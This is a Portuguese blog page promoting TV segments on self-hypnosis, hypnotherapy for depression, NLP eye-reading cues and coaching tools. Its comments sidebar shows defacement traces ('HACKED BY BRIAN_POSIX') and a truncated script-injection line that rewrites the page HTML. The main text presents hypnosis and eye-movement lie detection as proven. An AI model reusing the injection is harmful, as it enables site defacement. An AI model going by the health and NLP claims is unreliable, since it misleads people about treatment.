A auto-hipnose não é nada mais que uma técnica de hipnose aplicada pela pessoa que deseja hipnotizar-se a si mesma. É uma capacidade extremamente útil para a promoção da saúde e do bem-estar, sendo especialmente valiosa na gestão da dor, gestão do stress, ansiedade, insónias, autoestima, concentração, estudos e preparação para testes.

 

E que para além disso também pode ser utilizada apenas para atingir um estado de relaxamento profundo, dormir melhor e aumentar assim a qualidade de vida.

 

É um exercício muito simples de concentração e relaxamento, todo feito em silêncio podendo ser praticado em qualquer local, em casa, no trabalho, no autocarro, no meio da natureza e em vários outros sítios.

Descubra mais sobre o que esta técnica que pode fazer por si. No Mais Mulher desta segunda-feira, às 17:30!

Na SIC Mulher!

 

Veja o vídeo aqui!



As técnicas de hipnose podem auxiliar, agilizar e potencializar o tratamento da depressão.


De acordo com a Organização Mundial de Saúde (OMS), a depressão afecta um em cada 5 portugueses, o equivalente a 20% da população.
A perturbação depressiva pode ocorrer tanto em homens como em mulheres, de todas as idades e de qualquer classe social.

 

Por estas e outras razões Cris Carvalho e a sua paciente vão explicar como a hipnose pode ajudar, não perca no Mais Mulher desta segunda-feira às 17:30!

Veja o vídeo aqui!



Como funciona uma sessão com Hipnose?

 

A Hipnoterapia é um processo terapêutico pelo qual o profissional utiliza-se da Hipnose como um meio de comunicação direto com a mente subconsciente do cliente. Quando praticada por um profissional responsável, é completamente segura e pode ser utilizada para a mudança de hábitos e comportamentos, bem como para melhorar auto-estima, diminuição do stress, ansiedade, depressão, gestão de peso, parar de fumar, alivio da dor, entre outros. Saiba como acontece o processo de atendimento de um cliente, do início ao fim de uma sessão ou do tratamento em si.

 

Veja o vídeo aqui!



A Hipnose causa furor entre as mentes informadas e menos informadas, alguns enfatizam os seus mistérios, outros mostram a sua simplicidade.
A verdade é que o assunto “Hipnose” é hoje em dia algo muito comum nos meios terapêuticos.
A cada dia a medicina e vários estudos académicos derrubam a ideia errada de que a hipnose é uma prática mágica, esotérica ou teatral.
Hoje, é reconhecida como um eficaz método terapêutico e tem sido aplicada em diversos tratamentos e praticada até mesmo em hospitais.

Saiba mais sobre o que é a Hipnose e o que ela pode fazer por si.



Esteja a par das últimas pesquisas e estudos realizados a nível internacional sobre o Coaching.

Sabia que 92% dos líderes que fizeram coaching disseram que planeiam fazê-lo de novo e todos fornecem uma forte recomendação do Coaching? ( pesquisa realizada pela revista Harvard Business Review)

Conheça as tendências para uma das carreiras com maior potencial de expansão para os próximos 10 anos, as oportunidades e as dificuldades do mercado atual.

Acompanhe as novidades em primeira mão, trago algo completamente pioneiro para Coaching em Portugal!



Saiba como “ler” os olhos do seu interlocutor e interpretar sinais e pistas oculares durante uma conversa.
Nesta rubrica irei falar sobre as “pistas de acesso ocular”, já sabe o que é? Se a resposta for não, prepare-se para começar a entender ainda mais sobre como o seu interlocutor está pensando diante do diálogo.

Os olhos podem, através de seus movimentos, revelar em que aspeto da conversa uma pessoa está prestando atenção, ou seja, as estratégias de pensamento que ela está a utilizar. Dependendo da direção dos movimentos dos olhos, podemos saber se ela está a buscar uma informação armazenada em sua memória (lembrando), se está a usar a imaginação e a criar o teor da conversa naquele momento, ou ainda se está a tomar consciência de seus sentimentos com relação ao assunto.

Saber interpretar estas pistas, irá ajudar na criação de uma maior sintonia com as pessoas, aperfeiçoar e facilitar o processo comunicativo, e até mesmo desenvolver a sua capacidade de detetar mentiras.

Esteja atenta(o) aos movimentos dos olhos do seu interlocutor, descubra o que indica cada um dos destes movimentos, interprete juntamente com outros fatores ou pistas, e obtenha muito mais informações do que apenas as palavras que são ditas durante uma conversa.






Como o inconsciente pode atrapalhar ou facilitar a sua vida Sempre que uma pessoa está mentalmente presa a uma situação difícil e não consegue se libertar, ou não consegue reagir de uma maneira favorável, dizemos em PNL (Programação Neurolinguística) que está em um “estado problema” ou em um “estado sem recursos”.

A pessoa sente que não tem a habilidade ou a capacidade que lhe permita lidar com a situação problemática, encontra-se sem recursos e incapaz de pensar claramente ou agir eficazmente. Colocando de outra maneira, ela não consegue ter acesso a neurologia adequada para a tarefa, e assim, o cérebro será incapaz de encontrar uma solução. Novamente teremos que compreender o que se passa no inconsciente quando isto acontece, a partir daí ficará mais fácil mudar e aumentar o autocontrolo quando se trata de obter comportamentos e atitudes mais harmoniosos e equilibrados.

Junte-se a nós para continuarmos a nossa conversa sobre este tema tão interessante e determinante.



Como o inconsciente pode atrapalhar ou facilitar a sua vida.

 

 

Este é um assunto muito importante para ajudá-la(o) a compreender de uma vez por todas porque a sua vida pode estar fora de controle. Saiba que grande parte das suas experiências está sob a responsabilidade da parte inconsciente da sua mente.

 

Você reage às situações que acontecem no seu dia-a-dia por uma programação inconsciente que está instalada no seu cérebro. Isso faz com que o seu cérebro automaticamente escolha por você as suas respostas e os seus comportamentos, e talves você acabe por  decidir algo ou agir de certa maneira sem que realmente queira. Ou seja, algumas vezes você é quem decide o que fazer e que comportamento prefere ter, mas na maioria das vezes é a sua mente inconsciente que decide.

 

É no inconsciente que estão gravadas todas as nossas memórias; os nossos hábitos e padrões de comportamento permanecem armazenados ali. Nem sempre estamos cientes da razão pela qual reagimos da forma que o fazemos a determinados acontecimentos, apenas sabemos que reagimos de forma automática, a qual podemos chamar de programas internos.

 

Resta saber se os seus programas internos estão a seu favor ou estão contra você, se levam ao sucesso ou arrastam ao fracasso. Se está a obter resultados e respostas diferentes daquelas que gostaria de ter, provavelmente está na hora de mudar os programas guardados no seu inconsciente!

 

Junte-se a nós para uma conversa sobre este tema tão interessante e determinante.

 



Para conquistar os seus objectivos e alcançar ainda mais realização pessoal e profissional, você deve ainda reforçar elementos importantes de carácter.

Um carácter de sucesso deve ser revigorado com 4 características imprescindíveis:

 

1.Coragem

2.Persistência

3.Optimismo

4.Autodisciplina

 

Imagine uma situação importante em sua vida pessoal e adicione à sua abordagem uma pitada de cada um destes ingredientes…

Agora imagine a sua atitude na sua carreira também com um pouco mais destes mesmos elementos…

Faz toda a diferença!

A pergunta então será: “Como posso revigorar estas características em meu carácter?”

Descubra esta resposta e saiba mais sobre um carácter de sucesso com a ajuda do potencial da mente e do cérebro.

 

Na próxima rubrica Seja Muito Mais, conhecerá a base do treino de todo campeão!

 



Quantas vezes nos surgem objectivos em que as ideias ainda estão baralhadas, que não sabemos por onde começar? Que balançamos na decisão ou no plano de acção a implementar? Que duvidamos das ideias existentes ou precisamos de novas, para conseguirmos chegar um resultado diferente…

 

Quero ser mais organizada, mas….

Quero ter melhor gestão de tempo, mas….

Quero comunicar melhor com a minha equipa, mas…

Tenho um projecto para implementar, mas……

Uma tomada de decisão, mas….

 

A Grelha de Metas é um excelente exercício para este tipo de situações. Funciona em género de brainstorming organizado!

Ajuda-nos a organizar o nosso pensamento, a colocar as ideias no sítio certo, a orientar o nosso cérebro para o que é importante e que fará seguir na direcção do nosso objectivo.

 

Um processo de Coaching, leva-nos a utilizar estratégias de pensamentos diferentes do que temos habitualmente, para assim conseguirmos chegar mais longe!

 

Esta é uma excelente ferramenta para ser utilizada no Coaching executivo e por líderes com as suas equipas, no debate de ideias e para encontrar novas soluções.

 

O Manter, Eliminar, Adquirir e Evitar são as palavras-chave desta ferramenta.

 

Aprenda nesta rubrica, a trabalhar com estes 4 elementos da Grelha e perceber como de uma forma simples e eficaz, pode conseguir clarificar objectivos e sair do estado de confusão.

 

Até lá então…

 

Muito Sucesso

 



Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
subscrever feeds
blogs SAPO